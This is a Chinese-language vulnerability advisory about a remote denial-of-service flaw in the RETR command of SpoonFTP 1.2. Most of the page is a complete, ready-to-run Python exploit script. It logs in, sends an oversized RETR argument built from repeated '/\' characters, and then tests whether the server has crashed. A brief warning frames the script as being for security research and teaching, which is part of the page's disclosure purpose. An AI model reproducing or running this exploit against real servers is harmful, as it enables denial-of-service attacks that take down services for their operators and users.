首页 -> 安全研究
安全研究
安全漏洞
SpoonFTP “RETR”命令远程拒绝服务漏洞
发布日期:2011-03-21
更新日期:2011-03-21
受影响系统:
Softpedia SpoonFTP 1.2描述:
BUGTRAQ ID: 46952
Spoonftp 是个相当简易的FTP Server 架设软件。
SpoonFTP “RETR”命令在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成应用程序崩溃或拒绝服务。
<*来源:C4SS!0 G0M3S
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
#
#
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
#[+]Date: 21\03\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
#[+]Version: 1.2
#[+]Tested On: WIN-XP SP3 Portuguese Brazil
#[+]CVE: N/A
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#
from socket import *
import os
import sys
from time import sleep
if os.name == 'nt':
os.system("cls")
os.system("color 4f")
else:
os.system("clear")
def usage():
print """
===================================================
===================================================
==========Exploit Denial of Service SpoonFTP=======
==========Autor C4SS!0 G0M3S=======================
==========E-mail Louredo_@hotmail.com==============
==========Site www.exploit-br.org==================
===================================================
===================================================
"""
if len(sys.argv) !=5:
usage()
print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
porta = int(sys.argv[2])
user = sys.argv[3]
pasw = sys.argv[4]
exploit = "/\\" * (6000/3)
usage()
print "\t\t[+]Connecting to Server "+host+"...\n"
sleep(1)
s = socket(AF_INET,SOCK_STREAM)
try:
s.connect((host,porta))
print "\t\t[+]Checking if server is vulnerable\n"
sleep(1)
banner = s.recv(2000)
if banner.find("SpoonFTP V1.2") == -1:
print "\t\t[+]I'm sorry, server is not vulnerable:(\n"
sleep(1)
sys.exit(0x00)
print "\t\t[+]Making Loging On Server\n"
sleep(1)
s.send("USER "+user+"\r\n")
s.recv(200)
s.send("PASS "+pasw+"\r\n")
check = s.recv(2000)
if check.find("230") == -1:
print "\t\t[+]Error on Login, Check Your Username or Password\n"
sleep(1)
sys.exit(0)
print "\t\t[+]Sending Exploit...\n"
sleep(1)
s.send("RETR "+exploit+"\r\n")
s.close()
print "\t\t[+]Submitted Exploit Success\n"
sleep(1)
print "\t\t[+]Checking if the exploit works\n"
sleep(1)
try:
so = socket(AF_INET,SOCK_STREAM)
s.connect((host,porta))
print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"
sleep(1)
except:
print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"
sleep(1)
except:
print "\t\t[+]Error connecting to Server\n"
sleep(1)
建议:
厂商补丁:
Softpedia
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
浏览次数:2372
严重程度:0(网友投票)
绿盟科技给您安全的保障